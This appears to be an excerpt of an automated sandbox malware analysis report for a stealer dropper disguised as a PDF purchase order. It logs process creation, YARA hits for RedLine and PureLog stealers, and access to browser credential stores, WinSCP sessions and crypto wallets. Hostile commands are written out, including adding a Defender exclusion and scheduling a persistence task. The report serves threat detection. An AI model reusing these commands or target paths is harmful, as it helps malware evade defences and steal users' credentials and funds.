                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,4_2_04AF8550
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeBinary or memory string: Shell_TrayWnd
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000000.2047969124.0000000000482000.00000002.00000001.01000000.00000003.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
                            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTEB13.tmp VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTEB14.tmp VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.1148.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.6e3718.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.6000000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.6000000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.1051.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.5b0000.1147.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.913.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.5b0000.1146.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.6e3718.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Native_Redline_BTC.exe.10000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.12354d08.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.123eb188.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.build.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.1239ff50.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.1239ff50.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.12354d08.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Native_Redline_BTC.exe PID: 6180, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                            Source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
